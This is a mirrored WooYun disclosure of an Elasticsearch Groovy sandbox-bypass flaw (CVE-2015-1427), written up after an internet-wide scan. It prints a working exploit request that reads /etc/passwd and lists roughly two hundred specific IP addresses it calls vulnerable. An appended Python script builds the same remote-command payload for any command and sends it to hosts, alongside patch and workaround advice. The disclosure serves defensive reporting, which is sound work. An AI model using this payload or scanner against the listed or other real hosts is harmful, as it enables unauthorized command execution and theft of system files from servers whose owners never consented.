WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-03-15: Details sent to the vendor, awaiting vendor response
2015-03-18: Vendor confirmed; details disclosed to the vendor only
2015-03-28: Details disclosed to core white hats and relevant domain experts
2015-04-07: Details disclosed to regular white hats
2015-04-17: Details disclosed to intern white hats
2015-04-29: Details disclosed to the public
Arbitrary command execution on 3000+ cluster servers
After reading WooYun: How I built a "5000+ cluster server botnet" in 2 hours, I decided to run an automated internet-wide scan for the Elasticsearch Groovy dynamic script execution vulnerability (CVE-2015-1427). Across the whole internet, 3000+ vulnerable sites were found (after deduplication). 197 vulnerable IPs were found in China. The EXP is as follows:
POST IP:9200/_search?pretty
{
  "size": 1,
  "script_fields": {
    "test#": {
      "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()",
      "lang": "groovy"
    }
  }
}
Affected IPs in China:
http://114.80.156.167 http://202.105.7.173 http://112.126.64.18 http://121.40.62.116 http://203.195.197.22
http://182.92.220.150 http://115.28.181.216 http://182.92.0.244 http://121.199.1.80 http://121.41.72.14
http://121.41.53.71 http://115.28.191.16 http://116.55.245.125 http://114.215.205.185 http://112.124.6.56
http://120.24.225.118 http://115.29.227.90 http://61.154.116.182 http://115.29.246.247 http://112.126.73.73
http://115.236.59.194 http://103.31.203.246 http://203.195.151.221 http://115.29.250.200 http://121.40.106.146
http://203.195.194.168 http://112.124.59.36 http://115.29.235.200 http://221.234.42.157 http://121.41.75.56
http://121.41.117.85 http://114.215.178.149 http://114.215.182.17 http://211.151.7.138 http://115.28.149.20
http://121.41.53.252 http://121.199.29.244 http://210.34.4.74 http://42.62.105.193 http://58.215.139.37
http://203.80.144.147 http://182.92.183.155 http://115.29.232.33 http://121.42.44.81 http://182.92.185.67
http://221.122.117.100 http://222.46.26.181 http://121.42.43.41 http://115.29.4.204 http://118.192.85.69
http://183.131.78.117 http://112.124.127.92 http://114.119.5.13 http://211.149.162.148 http://120.27.50.144
http://202.38.82.13 http://112.124.32.45 http://121.40.207.8 http://203.195.212.109 http://219.223.190.240
http://42.121.0.1 http://119.254.111.115 http://118.126.11.236 http://117.135.160.33 http://114.119.5.11
http://219.223.190.244 http://115.28.42.79 http://222.128.5.168 http://112.126.73.126 http://121.42.54.213
http://121.199.13.100 http://119.29.21.23 http://115.159.25.211 http://121.201.107.31 http://115.29.228.42
http://122.144.133.98 http://111.1.36.241 http://175.102.35.207 http://115.29.244.108 http://61.174.8.250
http://180.150.165.236 http://121.40.186.130 http://183.136.214.115 http://101.69.176.166 http://115.159.27.203
http://60.194.60.122 http://121.199.46.98 http://114.112.84.245 http://121.42.44.105 http://59.175.153.121
http://115.28.216.245 http://59.175.153.37 http://59.50.115.187 http://112.124.122.191 http://112.124.109.98
http://120.27.29.171 http://123.57.135.102 http://121.42.54.231 http://60.173.26.169 http://120.24.53.40
http://121.40.72.69 http://121.199.43.101 http://211.147.220.169 http://120.27.46.165 http://121.40.123.81
http://219.239.238.131 http://120.24.65.119 http://61.175.96.35 http://218.25.139.156 http://121.40.85.12
http://121.41.24.243 http://183.63.24.133 http://42.62.40.183 http://114.215.107.77 http://115.29.237.149
http://121.197.1.219 http://123.57.64.70 http://114.80.210.48 http://119.29.38.185 http://106.39.63.119
http://182.254.202.95 http://114.215.204.97 http://121.42.15.119 http://182.254.201.126 http://182.92.100.197
http://123.162.189.105 http://60.12.69.245 http://121.40.139.76 http://115.29.145.89 http://59.175.153.122
http://182.92.189.194 http://218.244.150.169 http://202.136.62.243 http://121.42.41.74 http://123.57.83.185
http://182.18.47.199 http://211.157.188.219 http://123.57.9.138 http://115.28.9.13 http://115.29.9.119
http://121.41.48.196 http://120.92.244.150 http://121.41.114.133 http://121.41.117.106 http://121.40.104.63
http://115.28.181.92 http://121.42.41.91 http://120.24.81.56 http://58.68.250.156 http://119.90.0.154
http://58.210.46.6 http://221.122.121.97 http://219.232.240.226 http://202.104.70.251 http://42.62.15.183
http://115.29.174.74 http://42.62.73.186 http://120.27.44.63 http://182.92.218.156 http://117.121.31.140
http://120.132.57.81 http://115.238.164.185 http://115.29.76.225 http://121.42.40.149 http://121.41.55.16
http://59.42.210.213 http://120.132.66.197 http://112.124.11.22 http://115.28.220.66 http://203.195.234.184
http://120.132.56.152 http://58.23.5.117 http://58.23.5.118 http://54.223.161.189 http://123.57.42.74
http://115.29.163.225 http://218.244.143.196 http://203.195.148.250 http://183.131.78.93 http://222.87.144.140
http://121.40.53.9 http://121.42.148.190 http://182.254.165.146 http://115.29.227.90 http://211.151.7.139
http://218.244.143.196 http://182.92.159.210 http://125.77.199.221 http://61.174.9.217 http://58.61.38.143
http://121.41.52.69 http://115.28.157.134 http://182.92.238.251 http://203.195.151.221 http://123.57.5.118
http://182.92.216.104 http://54.223.160.171 http://124.193.144.140
Since this can be detected automatically, it can of course also be attacked automatically. The organizations concerned are asked to investigate.
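The EXP above is a one-shot curl body. The script below is an added example (not the author's scanner and not Elasticsearch project code) of how such a check is automated safely: it builds the same Groovy sandbox-bypass payload with a parametrized command, and instead of dumping /etc/passwd it executes echo with a random nonce and treats the host as vulnerable only if that nonce comes back in the script_fields output. The response shape (hits.hits[].fields["test#"]) is that of a real Elasticsearch 1.x _search reply; the sample response embedded here is constructed, and the host name and port in probe_host() are assumptions.

```python
import json
import secrets
import urllib.request  # used only by probe_host(); everything else runs offline

# Groovy sandbox bypass used by the EXP in the report: java.lang.Math.class is reachable
# inside the sandbox, and Class.forName() on it hands back arbitrary classes, so
# java.lang.Runtime.exec() is reached by reflection and its stdout read with readLines().
GROOVY_TEMPLATE = (
    'java.lang.Math.class.forName("java.io.BufferedReader")'
    '.getConstructor(java.io.Reader.class).newInstance('
    'java.lang.Math.class.forName("java.io.InputStreamReader")'
    '.getConstructor(java.io.InputStream.class).newInstance('
    'java.lang.Math.class.forName("java.lang.Runtime").getRuntime()'
    '.exec("{cmd}").getInputStream())).readLines()'
)

FIELD = "test#"  # script_fields key, same as in the report


def build_payload(cmd: str) -> dict:
    """Return the _search body that runs `cmd` through script_fields (same shape as the EXP)."""
    # The command is spliced into a Groovy double-quoted string; refuse characters that
    # would break out of it rather than trying to escape them.
    if '"' in cmd or "\\" in cmd:
        raise ValueError("command must not contain double quotes or backslashes")
    return {
        "size": 1,  # the script only runs against a hit, so the cluster must hold >= 1 document
        "script_fields": {
            FIELD: {"script": GROOVY_TEMPLATE.format(cmd=cmd), "lang": "groovy"},
        },
    }


def extract_output(resp: dict) -> list:
    """Collect the readLines() result from every hit in an Elasticsearch _search response."""
    lines = []
    for hit in resp.get("hits", {}).get("hits", []):
        lines.extend(hit.get("fields", {}).get(FIELD, []))
    return lines


def is_vulnerable(resp: dict, token: str) -> bool:
    """True only if the nonce we asked the host to echo appears in the script output."""
    return any(token in line for line in extract_output(resp))


def probe_host(host: str, port: int = 9200, timeout: float = 5.0) -> bool:
    """Send the nonce-echo payload to host:port and report whether it executed (network)."""
    token = secrets.token_hex(8)
    body = json.dumps(build_payload("echo " + token)).encode()
    req = urllib.request.Request(
        "http://%s:%d/_search?pretty" % (host, port),
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as r:
        return is_vulnerable(json.load(r), token)


# Constructed sample of what a vulnerable 1.x node returns for the nonce-echo payload.
SAMPLE_TOKEN = "deadbeefcafef00d"
SAMPLE_RESPONSE = {
    "took": 3,
    "hits": {
        "total": 12,
        "hits": [{"_index": "logs", "_id": "1", "fields": {FIELD: [SAMPLE_TOKEN]}}],
    },
}


if __name__ == "__main__":
    print(json.dumps(build_payload("cat /etc/passwd"), indent=2))
    print("sample response vulnerable:", is_vulnerable(SAMPLE_RESPONSE, SAMPLE_TOKEN))
```

Two caveats a scanner has to get right: an index with no documents yields no hits, so the script never runs and an unpatched node looks clean; and matching on a nonce rather than on "root:x:0:0" avoids false positives from indexed data that happens to contain passwd-like text. The vulnerability was fixed in Elasticsearch 1.4.3; on older nodes the workaround is to disable the Groovy sandbox (script.groovy.sandbox.enabled: false in elasticsearch.yml) or to keep port 9200 off the internet entirely.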
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-03-18 14:22
We have cross-checked the reported results against the IPs of important users and forwarded them to the respective users for handling.
None yet